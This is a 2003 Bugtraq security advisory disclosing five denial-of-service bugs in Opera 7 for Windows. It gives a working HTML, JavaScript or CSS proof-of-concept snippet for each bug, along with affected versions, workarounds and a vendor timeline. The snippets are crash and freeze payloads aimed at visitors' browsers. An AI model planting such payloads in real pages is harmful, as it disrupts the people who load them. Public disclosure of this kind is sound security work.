[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030701003027.3713.NESUMIN@softhome.net>
Date: Tue, 01 Jul 2003 00:45:28 +0900
From: ":: Operash ::" <nesumin@...thome.net>
To: bugtraq@...urityfocus.com
Subject: [Opera 7] Five DoS codes on general web sites
---------------------------------------------------------------------------------
TITLE :[Opera 7] Five DoS codes on general web sites
-= Fastest browser on earth, Fastest crash on earth too =-
PRODUCT : Opera for Windows
VERSIONS : 7.11b build 2887
7.11 build 2880
7.10 build 2840
7.03 build 2670
VENDOR : Opera Software ASA (http://www.opera.com/)
SEVERITY : Medium.
Abnormal Termination, Freeze, and DoS attacks.
DISCOVERED BY : imagine, nesumin
AUTHOR : :: Operash ::
REPORTED DATE : 2003-06-24
PUBLISHED DATE : 2003-07-01
----------------------------------------------------------------------------------
0. PRODUCT INFORMATION
========================
Opera for Windows is a GUI base Web browser.
Opera Software ASA (http://www.opera.com/)
1. DESCRIPTION
================
There are many unfixed bugs that cause abnormal termination
or freeze down in Opera 7.
Exploiting these bugs, attackers can do DoS attacks.
Followings are 5 sample codes, which are in general web sites.
2. SAMPLE CODE & IMPACT
=========================
[ CODE 1 ]
Just 12 bytes data "<!DOCTYPE" + NULL(\x00) + 1byte + ">" makes
CPU usage go up to 100%(depending on comp specs) and the computer
gets freeze down.
-----------------------------------------------------------------
<!DOCTYPE[\x00]A>
-----------------------------------------------------------------
[ CODE 2 ]
Abnormal termination is caused.
-----------------------------------------------------------------
<form></form><script>document.forms[0].submit()</script>
-----------------------------------------------------------------
[ CODE 3 ]
Abnormal termination is caused.
-----------------------------------------------------------------
<table>
<tr id="crash" style="display:inline"><td>
<script>crash.style.display = "none";</script>
</td></tr>
</table>
-----------------------------------------------------------------
[ CODE 4 ]
Abnormal termination is caused.
-----------------------------------------------------------------
<table>
<map id="crash" style="position:absolute"></map>
<script>crash.style.height = crash.style.width = '0';</script>
</table>
-----------------------------------------------------------------
[ CODE 5 ]
CPU usage go up to 100%(depending on comp specs) and the computer
gets freeze down.
-----------------------------------------------------------------
<html>
<head>
<style type="text/css">
<!--
.aaaaa:after{content:"A";display:block}
.bbbbb{display:run-in}
.ccccc{display:inline-block}
//-->
</style>
</head>
<body>
<div class="aaaaa">
<div class="bbbbb">
<div class="ccccc">
</div>
</div>
</div>
</body>
</html>
-----------------------------------------------------------------
3. SYSTEMS AFFECTED
=====================
Opera (For Windows)
7.11b build 2887
7.11 build 2880
7.10 build 2840
7.03 build 2670 (Excepting [ CODE 5 ])
Lower than 7.03 Versions might be affected too. (not tested)
4. EXAMINES
=============
Opera (For Windows, English/Japanese) :
7.11b build 2887
7.11 build 2880
7.10 build 2840
7.03 build 2670
Platform :
Windows 98SE Japanese Edition
Windows 2000 Pro SP3 Japanese Edition
5. WORKAROUND
===============
[ CODE 1 ] -----
[ CODE 2 ] Disable "JavaScript"
[ CODE 3 ] Disable "JavaScript"
[ CODE 4 ] Disable "JavaScript"
[ CODE 5 ] Disable "CSS Author mode"
6. TIME TABLE & VENDOR STATUS
===============================
2003-06-24 Reported to vendor.
2003-07-01 Released this advisory.
No reply from vendor.
7. DISCLAIMER
===============
A. We cannot guarantee the accuracy of all statements in this information.
B. We do not anticipate issuing updated versions of this information
unless there is some material change in the facts.
C. And we will take no responsibility for any kinds of disadvantages by
using this information.
D. You can quote this advisory without our permission if you keep the following;
a. Do not distort this advisory's content.
b. A quoted place should be a medium on the Internet.
E. If you have any questions, please contact to us.
* Exception
We strictly forbid 'Secunia' to republish or redistribute our advisory.
...Well, even though, we know this request would be ignored.
The CTO of Secunia has told us;
"If you do not want us to write about your vulnerabilities -
then stop posting them!"
Well.. We can do nothing for this sort of arrogance :/
8. CONTACT, ETC
=================
:: Operash ::
imagine (Operash Webmaster)
nesumin <nesumin@...thome.net>
Thanks to :
melorin
piso(sexy)
Powered by blists - more mailing lists